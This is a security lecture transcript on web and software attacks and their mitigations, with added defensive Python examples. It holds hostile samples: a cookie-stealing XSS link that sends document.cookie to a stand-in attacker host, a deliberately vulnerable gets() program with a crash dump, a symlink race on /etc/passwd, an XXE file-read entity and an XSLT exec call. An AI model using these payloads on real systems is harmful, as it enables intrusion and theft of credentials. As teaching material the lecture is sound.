Attacks, Mitigation and Fundamental Software Problems
DESCRIPTION
Attacks, mitigation and fundamental software problems. Input validation, filtering and damage control as software mechanisms. Attack examples: XSS, XSRF, buffer overflows, character aliases etc. Threat and mitigation ladder. Pseudonyms, faked reputation, social attacks. (PowerPoint PPT presentation)
TRANSCRIPT
Page 1: Attacks, Mitigation and fundamental software problems
Input Validation, Filtering and Damage Control as Software Mechanisms
Page 2: Attack Examples
XSS, XSRF, Buffer Overflows, Character Aliases etc.
Page 3: Threat and Mitigation Ladder
Diagram pairing each layer with its typical threats and the mitigations in use; the three lists keep the reading order of the slide.
Layers: multi-user system; network; home PC; application; user; software developer; peer-to-peer / Web 2.0 collaboration.
Threats: login trojan; spoofing, sniffing, man-in-the-middle (MIM); script, spoof; virus, trojan, credential stealing; (cross-site) script attack; phishing; spoofing; Google hacks, software architecture; pseudonyms, faked reputation, social attacks.
Mitigations: time ACLs; SSL/PKI; personal firewall, anti-virus, 2-factor authentication (PIN/TAN); input validation; signed transactions (TAs), GUI improvements; closures, IOC frameworks, J2EE transparency; research!
Page 4: The OWASP Top Ten (2004) grouped by problem area
Input/output related: A1 Unvalidated Input, A4 Cross Site Scripting, A5 Buffer Overflow, A6 Injection Flaws, A7 Improper Error Handling, A9 Application Denial of Service
AAA related: A2 Broken Access Control, A3 Broken Authentication and Session Management, A9 Application Denial of Service
Infrastructure: A8 Insecure Storage, A9 Application Denial of Service, A10 Insecure Configuration Management
System engineering: A9 Application Denial of Service
A9 appears in every group because a denial of service can be triggered at any of these layers.
Page 5: A "phishing link" to LBBW Bank: XSS due to bad input validation
http://www.lbbw.de/lbbw/html.nsf/webdokumente/framebooster.htm?OpenDocument&url=http://www.google.de
Hostname of the bank: www.lbbw.de. The url parameter is taken over unchecked into the bank's page, so the victim sees the bank's hostname in the address bar while the content comes from the attacker's URL.
Attack URL: here www.google.de as a harmless demonstration; in reality some IP address or a name close to the original site name, like lbbw-systems, lbbw-tech etc.
Page 7: Phishing with a man-in-the-middle proxy
Participants: browser/mail reader, badguy.de, mybank.de.
Phishing mail: "Dear Customer of mybank..." <a href="www.badguy.de">www.mybank.de</a>
1. Trick the user into clicking on the URL.
2. The user connects to badguy.de.
3. Badguy forwards the requests to the bank and sends the responses back to the user.
4. The bank asks the user to log in.
5. The user does transactions.
6. The man-in-the-middle modifies the transactions on the fly; it modifies the responses too.
7. The bank sends the user an SMS with a TAN.
8. The user sends the TAN to badguy, who forwards it to the bank and thereby completes the modified transaction.
Page 8: Cross-Site Scripting (XSS)
Participants: victim browser, attacker web server, web shop (accepts GET parameters and plays them back to the victim, thereby delivering the script code to the victim).
1. The user visits the attacker site and clicks on a link whose target is the web shop, with script in the GET parameters:
    GET webshop/guestbook?par1="<script...>
2. The web shop answers with a new page that contains the script.
3. The script runs in the web shop's origin and sends the victim's cookie to the attacker (CookieMailer).
Page 9: Cross-Site Request Forgery (XSRF or "web trojan")
Precondition: an existing session between the victim's browser and the web shop (CookieShop) before the attack.
1. The user visits the attacker site and clicks on a link to a (prefilled) HTML form whose target is the web shop; the input fields hold an order with the shipping address of the attacker.
2. The browser posts the form and, as for any request to that site, attaches the session cookie.
3. The web shop accepts the form as a valid order because of the existing session with the client, and sends the form response back to the victim.
Page 10: Injection attack (stored script)
Participants: victim browser, attacker web server, webmailer (CookieMailer, which does not check the input field that carries the script), user profile database.
1. The user visits the attacker site and clicks on a link to the webmailer: an HTML form targeting the webmailer with script code in the GET parameters.
2. The webmailer stores the script from the attacker in the user profile: the database is now contaminated.
3. Every page later built from that profile replays the script from the attacker.
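The three web attacks of pages 8 to 10 and their two standard defences, as an added example (Python, not code from the slides): the guest book reflects a GET parameter either raw or through output encoding, and the shop's order handler only accepts a form that carries a token bound to the session, which an attacker's prefilled form cannot know. The session store, the URLs and the field names are constructed for the example.

```python
import html
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed server-side session store: session id -> session data.
SESSIONS = {}


def new_session(user):
    """Log a user in: every session gets its own random CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid


def guestbook_vulnerable(query_string):
    """Page 8: the parameter is played back into the HTML unchanged, so
    par1=<script>... becomes live script running in the web shop's origin."""
    par1 = parse_qs(query_string).get("par1", [""])[0]
    return "<html><body>Your entry: " + par1 + "</body></html>"


def guestbook_fixed(query_string):
    """Same page with output encoding: '<', '>', '&' and quotes become
    entities, so the browser displays the text instead of executing it."""
    par1 = parse_qs(query_string).get("par1", [""])[0]
    return "<html><body>Your entry: " + html.escape(par1, quote=True) + "</body></html>"


def order_form(sid):
    """Page 9 defence: the shop's own form carries a token bound to the session;
    a prefilled form on the attacker's site cannot contain it."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="post" action="/order">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="address"><input type="submit"></form>')


def handle_order(sid, form_body):
    """The cookie (sid) only proves that a session exists, not who built the
    form; the token must match the one stored for this session."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401, "no session"
    fields = parse_qs(form_body)
    token = fields.get("csrf", [""])[0]
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403, "order rejected: CSRF token missing or wrong"
    address = fields.get("address", [""])[0]
    return 200, "order accepted, ship to: " + address


if __name__ == "__main__":
    # Constructed attack link: a cookie-stealing script in the GET parameter.
    q = "par1=%3Cscript%3Enew%20Image().src%3D'http://attacker/?'%2Bdocument.cookie%3C/script%3E"
    print(guestbook_vulnerable(q))
    print(guestbook_fixed(q))
    sid = new_session("victim")
    print(handle_order(sid, "address=attacker+street+1"))        # forged post: no token
    tok = SESSIONS[sid]["csrf"]
    print(handle_order(sid, f"csrf={tok}&address=victim+home"))   # from the shop's own form
```

The stored variant of page 10 needs the same output encoding at the point where the profile is rendered; encoding on input alone does not help once other contexts (mail headers, JSON) are involved.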
Page 11: A buffer overflow in four lines
    #include <stdio.h>

    int main(int argc, char** argv) {
        int foo = 0xeeee;        /* local variable, placed next to the array on the stack */
        char myArray[4];         /* room for 4 characters, none for the terminating zero */
        gets(myArray);           /* deliberately vulnerable: reads without any length limit */
        printf(" print integer first: %x ", foo);
        printf("%s ", myArray);
        return 0;
    }
Keyboard input (with return)     Display output
a                                eeee a
aa                               eeee aa
aaa                              eeee aaa
aaaa                             ee00 aaaa      (the terminating zero already overwrites the low byte of foo)
aaaaaaaaaaaaaa                   core dump with EIP = 61616161 (hex 61 == 'a')
Page 12: The crash
    Exception: STATUS_ACCESS_VIOLATION at eip=61616161
    eax=00000012 ebx=00000004 ecx=610E3038 edx=00000000 esi=004010AE edi=610E21A0
    ebp=61616161 esp=0022EF08 program=D:\kriha\security\bufferoverflow\over.exe, pid 720, thread main
    cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
    Stack trace:
    Frame Function Args
    90087 [main] over 720 handle_exceptions: Exception: STATUS_ACCESS_VIOLATION
    104452 [main] over 720 handle_exceptions: Error while dumping state (probably corrupted stack)
Our "aaaaaaaa..." input from the keyboard is now the address from which the CPU reads its next instruction (eip=61616161; the saved base pointer in ebp is overwritten as well). Now we know how to point the CPU at code we placed on the stack.
A program crash is a way into the system! On current systems stack canaries, non-executable stacks and address space randomization make this last step much harder, but the missing length check is the same bug.
Page 13: Stack layout
Stack frame of main, from high to low addresses (the layout the compiler chose here; compilers are free to order locals differently):
    function parameter (rightmost)
    leftmost function parameter
    RETURN address
    caller's BP copy
    foo
    myArray[3]
    myArray[2]
    myArray[1]
    myArray[0]    <- gets() starts writing here and continues upward toward the return address
Keyboard input (with return)     Stack contents
a                                eeee a (first array element)
aa                               eeee aa (first and second)
aaa                              eeee aaa (first, second and third)
aaaa                             ee00 aaaa (4 array elements plus the terminating zero, which lands in foo)
aaaaaaaaaaaaaa                   aaaaaaaaaaaaaa (all local variables and the return address overwritten, crash on function return)
Page 14: The kernel trap interface
Your code wants to send a message msg to stdout:
    push len          ; message length
    push msg          ; message to write
    push 1            ; file descriptor (stdout)
    mov  eax, 4       ; system call number (sys_write)
    int  0x80         ; kernel interrupt (trap)
    add  esp, 12      ; clean stack (3 arguments * 4 bytes)
    push 0            ; exit code
    mov  eax, 1       ; system call number (sys_exit)
    int  0x80         ; kernel interrupt; we do not return from sys_exit, so there is no need to clean the stack
(Passing the arguments on the stack is the BSD convention for int 0x80; Linux on x86 passes them in ebx, ecx and edx, with the call number likewise in eax.)
The trap (system call) interface is very important for attack code because it is POSITION INDEPENDENT: your code is NOT LINKED with the running program and therefore does not know where specific library functions etc. are located in the process. The kernel interface is always just there and can be used, for example, to start a new program with execve or to map further code into the process.
Page 15: Attack vectors on web services
• Wrong input length of variables
• Variables containing wrong characters or meta-characters
• Variables containing SQL commands
• Responses which expose SOAP error codes
Page 16: Administration and race conditions: TOCTOU (time-of-check-to-time-of-use) bugs
A privileged program dropping its rights in several steps:
1. Start as root.
2. Change the owner of the files it needs.
3. Change identity to the unprivileged user.
4. Change the runtime environment to a jail (e.g. chroot); the jail strips off the other rights.
Not atomic! Between any two steps the process runs with a mixture of old and new rights, and an attacker who can act at that moment exploits the gap.
Page 17: Symbolic link race on a predictable temp file
Time runs downward.
Attacker (knows the temp filename):
    # Attacker creates a symbolic link to passwd under the name the admin will use
    ln -s /etc/passwd /tmp/myFile
Admin:
    # Admin tries to create a temp file; touch follows the link and succeeds
    touch /tmp/myFile
    # Overwrites passwd accidentally
    echo foo > /tmp/myFile…
Page 18: Check-then-use in a setuid program
Time runs downward.
SetUid program:
    # check permissions
    stat("/tmp/myFile")
Attacker:
    chgrp foo bar            # changes the file between the check and the use
SetUid program:
    open("/tmp/myFile")
    … processing …
The check looks at a path name and the use opens the path name a second time; what is behind the name may have changed in between. Opening first and checking the descriptor with fstat() removes the window.
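Both races of pages 17 and 18 played out in a scratch directory, as an added example (Python, not code from the slides): an attacker plants a symbolic link under the predictable temp file name, the touch-then-write pattern follows it and clobbers the target, while an open with O_CREAT|O_EXCL|O_NOFOLLOW refuses, and the ownership check is done with fstat on the descriptor that is actually used. The stand-in for /etc/passwd and the file names are constructed for the example; it needs a POSIX system.

```python
import errno
import os
import shutil
import tempfile


def vulnerable_write(path, data):
    """touch-then-write as on page 17: open(2) follows a symlink planted at path."""
    with open(path, "w") as f:
        f.write(data)


def safe_create_and_write(path, data):
    """Create the file atomically: fail if anything (file or symlink) already
    exists, never follow a symlink, then write through the descriptor we got."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def open_if_owned_by(path, uid):
    """Page 18 done right: open first, then check the descriptor with fstat.
    There is no second path lookup, so nothing can be swapped in between."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        if os.fstat(fd).st_uid != uid:
            raise PermissionError("file is not owned by the expected user")
        return os.fdopen(fd, "r")
    except Exception:
        os.close(fd)
        raise


def demo():
    """Returns (target clobbered by the naive write, safe open refused, fstat check works)."""
    work = tempfile.mkdtemp()
    try:
        target = os.path.join(work, "passwd")          # stands in for /etc/passwd
        with open(target, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")
        victim = os.path.join(work, "myFile")          # the predictable temp name
        os.symlink(target, victim)                     # attacker wins the race

        vulnerable_write(victim, "foo\n")              # follows the link
        with open(target) as f:
            clobbered = f.read() == "foo\n"

        try:
            safe_create_and_write(victim, "foo\n")
            refused = False
        except OSError as e:                           # EEXIST (O_EXCL) or ELOOP (O_NOFOLLOW)
            refused = e.errno in (errno.EEXIST, errno.ELOOP)

        with open_if_owned_by(target, os.getuid()) as f:
            own_ok = f.read() == "foo\n"
        try:
            open_if_owned_by(target, os.getuid() + 1)
            wrong_owner_refused = False
        except PermissionError:
            wrong_owner_refused = True
        return clobbered, refused, own_ok and wrong_owner_refused
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print(demo())
```

For real temp files use tempfile.mkstemp(), which applies exactly these flags and a random name; the point of the example is why those flags matter.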
Page 19: Shatter attack: fundamental software design flaws
Participants: a Windows service with a GUI dialog containing a text entry field, and its window message handler.
1. Insert the attack code into the text entry field.
2. Find the location of the attack code in the service's address space (here: 0x4711).
3. Send a window message that carries the function address 0x4711.
4. The message handler receives the function address and calls it.
Here the danger is that any program can send certain window messages which contain function addresses IN THE RECEIVER'S ADDRESS SPACE. By placing some attack code into the receiver (not hard if the receiver uses a GUI) the attacker can then make the receiver's message handler direct control flow to the attack code (step 4 above). Since the service runs with higher privileges than the sender, this is a local privilege escalation.
Page 20: XML entity references as an attack vector
Receiver: parser -> XSLT processor -> result document with the embedded entity.
Input: an XML file with an entity reference pointing to an intranet entity, to another host or to a web server.
Does your XML processing system check the URIs of entity references BEFORE accessing them?
Internal information exposure attack: the entity resolves to a local file or an intranet resource, and its content ends up embedded in the result document.
DoS attack: if you offer a rendering service you might be abused to create artificial hits on some host.
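The check the slide asks for, as an added example (Python with the standard expat binding, not code from the slides): before the real parse or XSLT step, walk the DTD and collect every external entity declaration, then refuse the document if any URI is not an http(s) reference to a host on an allowlist. Expat only fetches external entities when an ExternalEntityRefHandler is installed, so this pass reads URIs without touching the file system or the network. The allowed host and the two sample documents are constructed for the example.

```python
import xml.parsers.expat
from urllib.parse import urlparse

# Assumption for this example: the only host our renderer may fetch entities from.
ALLOWED_ENTITY_HOSTS = {"schemas.example.org"}


class EntityPolicyError(ValueError):
    pass


def audit_external_entities(document, allowed_hosts=ALLOWED_ENTITY_HOSTS):
    """Return one record per external entity declared in the DTD.
    No handler for external entity references is set, so nothing is resolved."""
    findings = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is None:            # internal entity: literal value, nothing to fetch
            return
        u = urlparse(system_id)
        ok = u.scheme in ("http", "https") and u.hostname in allowed_hosts
        findings.append({"name": name, "uri": system_id, "allowed": ok})

    p = xml.parsers.expat.ParserCreate()
    p.EntityDeclHandler = on_entity_decl
    p.Parse(document, True)
    return findings


def accept_document(document):
    """Gate in front of the parser/XSLT processor: raise on any off-policy URI."""
    bad = [f for f in audit_external_entities(document) if not f["allowed"]]
    if bad:
        raise EntityPolicyError("refusing entities: " + ", ".join(f["uri"] for f in bad))
    return True


# Constructed samples: a file disclosure attempt plus an artificial hit on an
# intranet host (the two attacks of page 20), and a document within policy.
EVIL = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY secret SYSTEM "file:///etc/passwd">
  <!ENTITY hit SYSTEM "http://intranet.example.org/admin/">
]>
<doc>&secret;&hit;</doc>"""

BENIGN = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY legal SYSTEM "https://schemas.example.org/footer.xml">
]>
<doc>&legal;</doc>"""


if __name__ == "__main__":
    for f in audit_external_entities(EVIL):
        print(f)
    print(accept_document(BENIGN))
    try:
        accept_document(EVIL)
    except EntityPolicyError as e:
        print(e)
```

The simplest policy in practice is the empty allowlist: most services never need external entities at all, and a DOCTYPE in a request is then reason enough to reject it.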
Page 21: Script extensions in XSLT stylesheets
    <?xml version='1.0'?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version='1.0'>
    <xsl:output method="html" encoding="ISO-8859-1" indent="no"/>
    <!-- ==================================================== -->
    <xsl:script language="java" implements-prefix="sy" src="java:java.util.system"/>
    <xsl:template match="*">
      <xsl:message>
        <xsl:text>No template matches </xsl:text>
        <xsl:value-of select="sy:exec(…)"/>
        <xsl:text>.</xsl:text>
      </xsl:message>
    </xsl:template>
    </xsl:stylesheet>
A stylesheet that the processor accepts from a user can bind a prefix to a Java class and call into it: the transformation then runs code of the stylesheet author's choice on the server.
Page 22: Suppressing validation
Receiver: parser -> XSLT processor -> result document with the embedded entity.
Input: an XML file with a foul schema that the document itself points to, instead of the good schema the receiver loaded.
James Clark mentioned recently an especially evil way to work around validation: "Suppose an application is trying to use validation to protect itself from bad input. It carefully loads the schema cache with the namespaces it knows about, and calls validate(). Now the bad guy comes along and uses a root element from some other namespace and uses xsi:schemaLocation to point to his own schema that has a declaration for that element and uses <xs:any namespace="##any" processContents="skip"/>. Won't they just have almost completely undermined any protection that was supposed to come from validation?"
Page 23: The three layers of Unicode
Code points: names and numbers of characters, for most characters in the languages of the world; 17 planes of 65,536 code points each, 1,114,112 in total.
Encodings: UTF-8, UTF-16 or UTF-32 encodings of the code points (code units or blocks); three different ways to encode ALL code points (size vs. performance).
Glyphs: arbitrary glyphs (fonts), not defined by Unicode.
Page 24: Normalize first, then filter
One code point can have several different encodings (the slide shows one code point, 0x4711, reached by the encodings 0x12…, 0x.., 0x..). Filter code needs to NORMALIZE FIRST and then FILTER!
Filter code to detect ..\..\ attacks:
    if (encoded == 0x4711)
        removeCharacter();
    // what about the other possible encodings of backslash????
Page 25: Unicode exploit: overlong encodings
Code point U+0000 can be written in UTF-8 as the single byte 0, as the two-byte sequence 110 00000 10 000000, as a three-byte sequence, etc. Decoders are not allowed to interpret any encoding other than the shortest form, in this case the single byte 0. Otherwise the extended forms could escape a filter that looks for the short form and become active later during interpretation.
Page 26: Glyphs and character aliases
Fonts can display Unicode code points any way they want. Two different code points (0x4711 and 0x1998 on the slide) can share one visual "look": lowercase "l" and uppercase "I", the digit 0 and the letter O, or Greek omicron vs. Latin o.
Page 27: Unicode homographs and DNS
DNS names, once ASCII only, can now contain Unicode characters. Two different code points, drawn by fonts that Unicode does not define, can have one visual "look" (e.g. lowercase "l" and uppercase "I", or Greek omicron vs. Latin o).
The Firefox browser switched back to showing the escaped ASCII form of Unicode domain names to allow the user to differentiate e.g. a Latin "a" from a Cyrillic "a". Otherwise the user could be tricked into connecting to www.ebay.com with the "a" really being the Cyrillic version; in this case the user would connect to the wrong site. Expect many more security problems with Unicode in the future, especially in the GUI area.
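The three Unicode problems of pages 24 to 27 in one place, as an added example (Python, not code from the slides): a naive decoder of the kind that accepts overlong forms turns the bytes C0 AE C0 AE C0 AF into "../" although no byte-level filter would see "../" in them, while Python's strict codec rejects them; the traversal filter normalizes to NFKC first so that a fullwidth backslash cannot slip past; and a domain label is flagged when its letters come from more than one script. The sample inputs are constructed for the example.

```python
import unicodedata


def decode_utf8_lenient(data):
    """A naive decoder that only unpacks the bits of the UTF-8 scheme, without
    checking for the shortest form (constructed here to show the bug)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 0
        elif b & 0xE0 == 0xC0:
            cp, n = b & 0x1F, 1
        elif b & 0xF0 == 0xE0:
            cp, n = b & 0x0F, 2
        elif b & 0xF8 == 0xF0:
            cp, n = b & 0x07, 3
        else:
            raise ValueError("invalid lead byte %#x" % b)
        for k in range(1, n + 1):
            cp = (cp << 6) | (data[i + k] & 0x3F)
        out.append(chr(cp))
        i += n + 1
    return "".join(out)


def decode_utf8_strict(data):
    """Python's codec refuses non-shortest forms: None means 'reject the input'."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def contains_traversal(text):
    """The filter of page 24 in the right order: normalize, then look for the pattern."""
    normalized = unicodedata.normalize("NFKC", text)
    return "../" in normalized or "..\\" in normalized


def script_of(ch):
    """First word of the character's Unicode name: LATIN, CYRILLIC, GREEK, ..."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def is_mixed_script(label):
    """Page 27: letters from two scripts in one DNS label is the homograph pattern."""
    return len({script_of(c) for c in label if c.isalpha()}) > 1


# Constructed samples.
OVERLONG_DOTDOTSLASH = b"\xc0\xae\xc0\xae\xc0\xaf"   # overlong ".", ".", "/"
FULLWIDTH = "..\uff3c"                                # ".." + FULLWIDTH REVERSE SOLIDUS
HOMOGRAPH = "eb\u0430y"                               # Cyrillic a (U+0430) for the Latin a


if __name__ == "__main__":
    print(b"../" in OVERLONG_DOTDOTSLASH, decode_utf8_lenient(OVERLONG_DOTDOTSLASH))
    print(decode_utf8_strict(OVERLONG_DOTDOTSLASH))
    print(contains_traversal(FULLWIDTH), is_mixed_script(HOMOGRAPH), is_mixed_script("ebay"))
```

The order matters twice: reject non-shortest encodings before any character-level check, and normalize before any pattern match; a filter placed before either step is checking a different string than the one the application will use.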
Page 29: Amazon E-Commerce Service: sample REST request with Style parameter
http://webservices.amazon.com/onca/xml?Service=AWSECommerceService&AWSAccessKeyId=[Your Access Key ID Here]&Operation=ItemLookup&IdType=ASIN&ItemId=B00008OE6I&ResponseGroup=Large&Style=http://www.yourdomain.com/your-xsl-style-sheet.xsl
The Style parameter names a stylesheet on the caller's own server which the service fetches and applies to the response: a user-supplied XSLT executed on the service side, exactly the situation of page 21.
Page 30: Ajax round trip
Browser: a page with a form (input ID: 4711, input name: kriha, input first name: walter) and a "locate" button; JavaScript sends the request with XMLHttpRequest.send(), and a callback function updates the page's DOM with the result.
Request to the web server (Servlet/getId):
    <request> <id>4711</id> </request>
Response:
    <response> <id>4711</id> <name>kriha</name> <firstname>walter</firstname> </response>
    function callback() { // update DOM }
Page after the update: ID: 4711, Name: kriha, First: walter.
Use JSON serialization alternatively!
Page 31: Scripts from two sites in one page
A page with its own JavaScript and two frames: frame 1 holds content and a script from site 1, frame 2 holds content and a script from site 2. The browser's same-origin policy is what keeps the scripts of the two frames apart.
Page 32: Web 2.0 community site: everything in one domain
The web server of a community wiki/place hosts the profile of user 1, the profile of user 2 and the common pages; the browser of user 1 shows a page (ID: 4711, Name: kriha, First: walter, "locate"). The profile pages are in the same domain and public! A script that user 2 plants in his profile runs in the same origin as user 1's pages and data.
Page 33: What a page under the attacker's control can do in the browser
Web server -> browser -> page with JavaScript under the attacker's control:
• CSS/RSS and the browser history: check for sites visited and queries made
• Intranet with automatic SSO: fingerprinting with link statements
• Cross-site request forging, port scans with img/links and "onerror"
• Keylogger
• Embedded script in PDF, MOV etc.
Page 34: Known Mitigation Examples
WAF filtering, network level filtering
Page 35: Web application firewall in front of a web service
Web service client -> firewall (http, port 80, 443) -> web server with mod_security -> application server.
    POST /InStock HTTP/1.1
    Host: www.example.org
    Content-Type: application/soap+xml; charset=utf-8
    Content-Length: nnn

    <?xml version="1.0"?>
    <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
      <soap:Body xmlns:m="http://www.kriha.org/number">
        <m:GetId> <m:Number>4711</m:Number> </m:GetId>
      </soap:Body>
    </soap:Envelope>
Check Number for:
- length
- characters/meta-characters
- SQL commands
Check the response for SOAP faultcodes (avoid exposure of error information).
mod_security rule (1.x syntax, sketch):
    SecFilterSelective Number "!^(|[0-9]{1,9})$"
The rule is positive: it rejects everything that is not empty or 1 to 9 digits, which covers all three checks at once.
Page 36: Other security related features of web application firewalls (e.g. mod_security)
• URL checking
• Unicode normalization
• Message canonicalization for filtering
• Stateful filtering of selected requests
• Stateful connection of input/output values
• Stateful link/request control (did the link come from the server?)
Page 37: Tainting as a software mechanism
    interface TaintedString {
        void check();
        String getString();
    }

    class TaintedInputString implements TaintedString {
        TaintedInputString(String s) { string = s; }
        void check() {
            checkSQL();
            checkJavaScript();
            checkUnicode();
        }
        String getString() {
            check();
            return string;
        }
    }

    class TaintedOutputString implements TaintedString {
        TaintedOutputString(String s) { string = s; }
        void check() {
            checkForOwnScriptOnly();
        }
        String getString() {
            check();
            return string;
        }
    }
The raw string is never handed out without passing check(): input strings are checked for SQL, JavaScript and Unicode tricks, output strings for anything but the application's own script.
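The tainting sketch made concrete, as an added example (Python, not code from the slides): the wrapper refuses to give up its value except through a validator, the validators are positive (the Number rule from page 35 and a name rule), normalization happens before validation as page 24 demands, the output side encodes for HTML, and a lookup query takes the validated value as a bound parameter. The validators, the query and the table name are assumptions made for the example.

```python
import html
import re
import unicodedata


class TaintError(ValueError):
    pass


class TaintedString:
    """Text that arrived from outside. The raw value is only reachable through
    a validator, so SQL, HTML or shell sinks cannot get unchecked data by accident."""

    def __init__(self, raw):
        self._raw = raw

    def __str__(self):
        raise TaintError("tainted value used without validation")

    def validated(self, validator):
        # Normalize first (page 24), then let the validator decide.
        return validator(unicodedata.normalize("NFKC", self._raw))


# Positive validators: they state what is allowed, not what is forbidden.
NUMBER = re.compile(r"[0-9]{1,9}")                 # the rule from page 35
NAME = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")   # assumption: what a name may look like


def as_number(s):
    if not NUMBER.fullmatch(s):
        raise TaintError("Number: expected 1 to 9 digits, got %r" % s)
    return int(s)


def as_name(s):
    if not NAME.fullmatch(s):
        raise TaintError("name: unexpected characters or length in %r" % s)
    return s


def for_html(s):
    """Output side (TaintedOutputString): encode for the HTML context it is written into."""
    return html.escape(s, quote=True)


def lookup_query(tainted_id):
    """The page 30 lookup: the validated value travels as a bound parameter,
    never by string concatenation."""
    return "SELECT name, firstname FROM users WHERE id = ?", (tainted_id.validated(as_number),)


if __name__ == "__main__":
    print(lookup_query(TaintedString("4711")))
    print(TaintedString("\uff14\uff17\uff11\uff11").validated(as_number))   # fullwidth digits
    for bad in ("4711 OR 1=1", "<script>", "../etc/passwd"):
        try:
            TaintedString(bad).validated(as_number)
        except TaintError as e:
            print(e)
    print(for_html("<script>alert(1)</script>"))
```

A blacklist check such as checkSQL() has to enumerate every trick; the positive rule only has to describe the one shape a Number may have, which is also why the fullwidth digits above are accepted after normalization rather than rejected as "strange characters".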
Page 38: Packet filter
A packet filter between two network interfaces (NIC1 towards the Internet, NIC2 towards the intranet) decides per packet on header fields:
• IP header parameters (e.g. protocol tcp or udp; destination/source address, external or internal network address)
• TCP header parameters (e.g. port and direction)
• ICMP header parameters (e.g. packet size, types)
Example packet pair (from : to): xxx(20) -> yyy(4567), tcp, and the reply yyy(4567) -> xxx(20), tcp, where xxx is an external and yyy an internal network address.
Rule from the firewall policy:
    if (port == 22) && (protocol == TCP) && (NIC1-outgoing) then Action: Accept
(not real IPTABLES syntax)
Page 39: Network Address Translation (NAT)
IP header:
    Version | Header length | Type of Service | Total Length
    Identification | Flags | Fragmentation Offset
    Time to live | Protocol | Header Checksum
    Source Address
    Destination Address
    Options | Padding
    data ..................
Network Address Translation (NAT) means that the source or destination address of a packet is changed.
With Source NAT (SNAT) the source address is changed, e.g. to map from private IP addresses to the real IP address of a firewall, thereby hiding the internal network.
With Destination NAT (DNAT) the target address is changed, e.g. to allow transparent proxying or load balancing.
Masquerading is almost like SNAT, only that there is no static IP address. Instead the source address is the one dynamically obtained from an ISP, e.g. via DHCP, PPPoE etc.
Page 40: Netfilter hooks
Hooks in the order a packet meets them: NF_IP_PRE_ROUTING, then routing; packets to the firewall itself go to NF_IP_LOCAL_IN, packets through the firewall go to NF_IP_FORWARD; packets from the firewall start at NF_IP_LOCAL_OUT and pass routing; everything that leaves passes NF_IP_POST_ROUTING. The filter, nat and mangle tables attach their chains to these hooks.
Page 41: iptables chains
Pre-processing -> routing -> input chain (packets directed at the firewall itself) or forward chain (all input not directed at the firewall itself goes here) -> output chain (firewall generated packets) -> routing -> post-processing.
Destination NAT happens in pre-processing, before the routing decision; source NAT happens in post-processing. Packet changes happen ONLY in these nat/mangle steps, never in the filter chains.
Page 42: iptables examples
    iptables -t filter -A INPUT -i $IFACE -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
      (allow incoming web traffic if it belongs to a previous outgoing request)
    iptables -A INPUT -i $IFACE -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
      (allow incoming ACTIVE ftp data traffic if it belongs to a previous outgoing request, even though the incoming connection is for a new, but related, port)
    iptables -A INPUT -i $IFACE -p udp -j LOG --log-prefix "UDP Incoming:"
    iptables -A INPUT -i $IFACE -p udp -j DROP
      (log and drop all udp traffic; this only works in this order, since LOG does not terminate rule processing and the packet continues to the DROP rule)
General form: iptables -t table -command [chain] [match] -j [target/jump]
Page 45: Filtering firewall with a DMZ
Internet -> filter (firewall) -> intranet 192.168.1.0/24
Hosts placed behind the filter: smtp host, WEB host and DNS host with the public addresses 192.84.219.128, 192.84.219.129 and 192.84.219.130; 192.168.1.250 is on the intranet side.
Page 46: UDP hole punching (Skype)
Two hosts in different intranets, each behind its own firewall: host 192.168.1.20 behind firewall 1.2.3.4 and host 192.168.1.20 behind firewall 11.12.13.14 (the private addresses may well coincide).
1. Both register with the Skype server and get the partner's public IP and port: the first learns 11.12.13.14:9000, the second learns 1.2.3.4:8000.
2. Each sends a UDP packet to the partner: the first to 11.12.13.14:9000 from source port 8000, the second to 1.2.3.4:8000 from source port 9000. These first packets are thrown away by the partner's firewall.
The trick is in step 2: by sending a UDP packet to destination address:target port (which gets thrown away) the OWN firewall learns to expect packets from this address because it believes them to be a RESPONSE (Jürgen Schmidt). After that, the partner's packets with source 11.12.13.14:9000 resp. 1.2.3.4:8000 pass both firewalls.
Page 47: XMLHttpRequest meets the login redirect
Browser -> web server (with an authentication plug-in talking to an authentication server) -> application server. While the session is valid, a request from XMLHttpRequest is answered with data; after a session timeout the same request is answered with a 302 to the login page, which the script's callback must recognize instead of writing it into the DOM.
Page 48: Browser security models
Which privilege a browser action requires:
  Internet Explorer: depends on the security zone (Intranet, Internet etc.) the site is in.
  Firefox/Mozilla: depends on a check per action, whose outcome can be made persistent.
Page 49: Fundamental Questions
Page 50: Input Validation
• Are regexp checks enough?
• How do servlet filters work?
• How to separate non-terminals from terminals?
• Forwarding of modified request data: the problem of double decoding
• Is application input a language? Of what type? How expressed? A design question?
• Tainting as a software mechanism
Page 51: Filtering
• Anti-patterns of filter use?
• Proof of correctness: is illegal input blocked?
• Proof of liveness: does legal input still get through?
• Mixing of reject and accept statements?
• Filter models and automated checkers?
• Filter positions in software?
Page 52: Concurrency
• Libraries for safe shell programming?
• Is shared-state multithreading reliable and predictable?
• Architectures for safe concurrency (Miller)?
• Active objects, CSP etc.
Page 53: Ambient Authority
